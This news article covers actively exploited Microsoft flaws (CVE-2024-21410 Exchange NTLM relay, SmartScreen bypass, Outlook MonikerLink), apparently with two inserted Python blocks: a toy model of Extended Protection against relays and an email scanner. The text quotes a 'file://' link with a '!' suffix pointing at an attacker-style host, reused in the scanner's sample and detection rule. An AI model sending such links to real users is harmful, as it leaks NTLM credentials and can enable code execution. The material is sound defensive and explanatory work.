Critical Exchange Server flaw (CVE-2024-21410) under active exploitation

Critical Exchange Server Flaw

Microsoft acknowledged Wednesday that a newly disclosed critical vulnerability in Exchange Server has been actively exploited in the wild, a day after it released fixes for the vulnerability as part of its Patch Tuesday updates.

Tracked as CVE-2024-21410 (CVSS score: 9.8), the issue has been described as a privilege escalation affecting the Exchange Server.

“An attacker could target an NTLM client such as Outlook with an NTLM credential vulnerability,” the company said in an advisory published this week.

“The leaked credentials can then be passed to the Exchange server to gain privileges as a victim client and perform operations on the Exchange server on behalf of the victim.”

Successful exploitation of the flaw could allow an attacker to pass a user’s leaked Net-NTLMv2 hash to a vulnerable Exchange Server and authenticate as that user, Redmond added.

The tech giant, in an update to its bulletin, revised its Exploitability Assessment to ‘Exploitation Detected’, noting that it now enables Extended Protection for Authentication (EPA) by default with the Exchange Server 2019 Cumulative Update 14 (CU14) update.
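The relay Microsoft describes above, and why Extended Protection stops it, as an added illustration that is not Microsoft's code and not a real NTLM implementation: a simplified Python model in which SHA-256 and HMAC-SHA256 stand in for the NT hash, the NTLMv2 proof and the channel-binding hash, and the password, certificates and challenge are constructed values. The one idea it keeps faithfully is the binding: with EPA the client's proof covers a hash of the TLS certificate it actually saw, and the server recomputes the proof with a hash of its own certificate, so a relay that terminates the victim's session with a different certificate (or no TLS at all) produces a proof the real server rejects.

```python
import hashlib
import hmac
import os
from typing import Optional

# Constructed stand-ins; none of these are real secrets or certificates.
VICTIM_NT_HASH = hashlib.sha256(b"constructed victim password").digest()
EXCHANGE_CERT = b"constructed DER of the real Exchange TLS certificate"
ATTACKER_CERT = b"constructed DER of the relay's own TLS certificate"

# Sent when there is no TLS session to bind to (real NTLM uses an all-zero binding there too).
ZERO_CBT = b"\x00" * 32


def channel_binding_token(tls_server_cert: Optional[bytes]) -> bytes:
    """tls-server-end-point style binding: a hash of the certificate the client saw on its session."""
    if tls_server_cert is None:
        return ZERO_CBT
    return hashlib.sha256(tls_server_cert).digest()


def client_respond(nt_hash: bytes, server_challenge: bytes, seen_cert: Optional[bytes]) -> dict:
    """Client side: the proof covers the server challenge, a client nonce and the binding token."""
    client_nonce = os.urandom(8)
    cbt = channel_binding_token(seen_cert)
    proof = hmac.new(nt_hash, server_challenge + client_nonce + cbt, hashlib.sha256).digest()
    return {"client_nonce": client_nonce, "cbt": cbt, "proof": proof}


def server_accept(nt_hash: bytes, server_challenge: bytes, response: dict,
                  own_cert: bytes, epa_required: bool) -> bool:
    """Server side. Without EPA the server trusts whatever binding the client sent (it is not
    checked); with EPA it insists the proof was built over a hash of its OWN certificate."""
    expected_cbt = channel_binding_token(own_cert) if epa_required else response["cbt"]
    expected = hmac.new(nt_hash, server_challenge + response["client_nonce"] + expected_cbt,
                        hashlib.sha256).digest()
    return hmac.compare_digest(expected, response["proof"])


def relay_attempt(epa_required: bool, relayed: bool, victim_uses_tls: bool = True) -> bool:
    """One authentication against Exchange. relayed=True models an attacker in the middle who
    terminates the victim's connection and forwards the NTLM messages to the real server
    unchanged; without the NT hash it cannot rebuild the proof for a different binding."""
    server_challenge = os.urandom(8)  # issued by the real Exchange server, forwarded by the relay
    if not victim_uses_tls:
        seen_cert = None
    else:
        seen_cert = ATTACKER_CERT if relayed else EXCHANGE_CERT
    response = client_respond(VICTIM_NT_HASH, server_challenge, seen_cert)
    return server_accept(VICTIM_NT_HASH, server_challenge, response, EXCHANGE_CERT, epa_required)


if __name__ == "__main__":
    for epa in (False, True):
        for relayed in (False, True):
            print(f"EPA={epa!s:5} relayed={relayed!s:5} -> accepted={relay_attempt(epa, relayed)}")
```

The output table shows the relayed case accepted only when EPA is off, which is the configuration change CU14 makes by default; the model also shows why EPA must be enforced on the server side, since a relay can strip TLS from the victim and send the zero binding.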

Details about the nature of the exploitation and the identities of the threat actors potentially exploiting the vulnerability are currently unknown. However, Russian state-affiliated hacking crews such as APT28 (also known as Forest Blizzard) have a history of exploiting flaws in Microsoft Outlook to conduct NTLM relay attacks.

Earlier this month, Trend Micro implicated the adversary in NTLM relay attacks targeting high-value entities since at least April 2022. The intrusions targeted organizations involved in foreign affairs, energy, defense and transportation, as well as organizations concerned with labor and social security, finance, parenting and local councils.

Critical Exchange Server Flaw

CVE-2024-21410 joins two other Windows flaws – CVE-2024-21351 (CVSS score: 7.6) and CVE-2024-21412 (CVSS score: 8.1) – that Microsoft patched this week and that are being actively weaponized in real-world attacks.

The exploitation of CVE-2024-21412, a bug that allows bypassing Windows SmartScreen protections, is attributed to an advanced persistent threat called Water Hydra (aka DarkCasino), which has previously exploited zero-days in WinRAR to deploy the DarkMe trojan.

“The group used Internet shortcuts disguised as a JPEG image that, when selected by the user, allows the threat actor to exploit CVE-2024-21412,” Trend Micro said. “The group can then bypass Microsoft Defender SmartScreen and fully compromise the Windows host as part of its attack chain.”

Microsoft’s Patch Tuesday update also addresses CVE-2024-21413, another critical flaw in Outlook email software that could result in remote code execution by trivially bypassing security measures such as Protected View.

The issue, codenamed MonikerLink by Check Point, “will have a broad and severe impact, ranging from leaking local NTLM credential information to arbitrary code execution.”

The vulnerability stems from improper parsing of “file://” hyperlinks: appending an exclamation mark to a URL that points to an arbitrary payload hosted on an attacker-controlled server (for example, “file:///\\10.10.111.111\test\test.rtf!something”) causes Outlook to follow the link without the usual protections.

“The bug not only enables the leak of local NTLM information, but also allows remote code execution and more as an attack vector,” the cybersecurity firm said. “It could also bypass the Office Protected View when used as an attack vector to target other Office applications.”
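A mail-gateway check for the link shape described in the two paragraphs above, as an added example that is not Check Point's or Microsoft's code: it pulls hyperlinks out of a message body, splits each `file:` URL into host, path and any `!`-suffixed tail, and flags the MonikerLink pattern separately from ordinary remote file links (which are worth a second look anyway, since following one exposes NTLM credentials to the share host). The sample message, the host names and the verdict strings are constructed; the first link reuses the URL shape quoted on the page.

```python
import re
from html.parser import HTMLParser
from typing import Dict, List

# Any file: URL in mail text (stops at whitespace, quotes and angle brackets).
FILE_URL_RE = re.compile(r'file:[^\s"\'<>]+', re.IGNORECASE)
LOCAL_DRIVE_RE = re.compile(r"^[A-Za-z]:$")


class _HrefCollector(HTMLParser):
    """Collect href values from <a> tags in an HTML mail body."""

    def __init__(self) -> None:
        super().__init__()
        self.hrefs: List[str] = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "a":
            for name, value in attrs:
                if name.lower() == "href" and value:
                    self.hrefs.append(value.strip())


def extract_links(body: str) -> List[str]:
    """Hyperlinks from <a href> plus bare file: URLs typed straight into the text."""
    collector = _HrefCollector()
    collector.feed(body)
    links = list(collector.hrefs)
    for match in FILE_URL_RE.finditer(body):
        if match.group(0) not in links:
            links.append(match.group(0))
    return links


def analyze_file_link(url: str) -> Dict[str, object]:
    r"""Split a file: URL into host, path and any '!'-suffixed tail.

    The page's example, file:///\\10.10.111.111\test\test.rtf!something, yields
    host 10.10.111.111, path test\test.rtf and moniker tail 'something'.
    """
    rest = url[len("file:"):].lstrip("/\\")  # drop the scheme slashes and the UNC prefix
    parts = re.split(r"[\\/]", rest, maxsplit=1)
    host = parts[0]
    path = parts[1] if len(parts) > 1 else ""
    file_part, bang, moniker_tail = path.partition("!")
    remote = bool(host) and host.lower() != "localhost" and not LOCAL_DRIVE_RE.match(host)
    return {
        "url": url,
        "host": host,
        "path": file_part,
        "moniker_bang": bang == "!",
        "moniker_tail": moniker_tail,
        "remote": remote,
    }


def scan_email(body: str) -> List[Dict[str, object]]:
    """One finding per file: link; the '!' pattern is the CVE-2024-21413 indicator."""
    findings = []
    for link in extract_links(body):
        if not link.lower().startswith("file:"):
            continue
        info = analyze_file_link(link)
        if info["moniker_bang"]:
            info["verdict"] = "block: file link with '!' moniker suffix (CVE-2024-21413 pattern)"
        elif info["remote"]:
            info["verdict"] = "review: file link to a remote host (NTLM credential exposure risk)"
        else:
            info["verdict"] = "info: local file link"
        findings.append(info)
    return findings


# Constructed sample mail body (hosts and text are made up for this example).
SAMPLE_EMAIL_HTML = r"""
<html><body>
<p>Please review: <a href="file:///\\10.10.111.111\test\test.rtf!something">quarterly report</a></p>
<p>Policy document: <a href="file://fileserver.corp.example/docs/policy.rtf">policy.rtf</a></p>
<p>Dashboard: <a href="https://intranet.corp.example/report">intranet</a></p>
</body></html>
"""

if __name__ == "__main__":
    for finding in scan_email(SAMPLE_EMAIL_HTML):
        print(finding["verdict"], "->", finding["url"])
```

Run as written it reports the first link as a block and the second as a review item, and ignores the HTTPS link; the bare-URL fallback in `extract_links` matters because a plain-text message carries no `<a>` tags at all.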
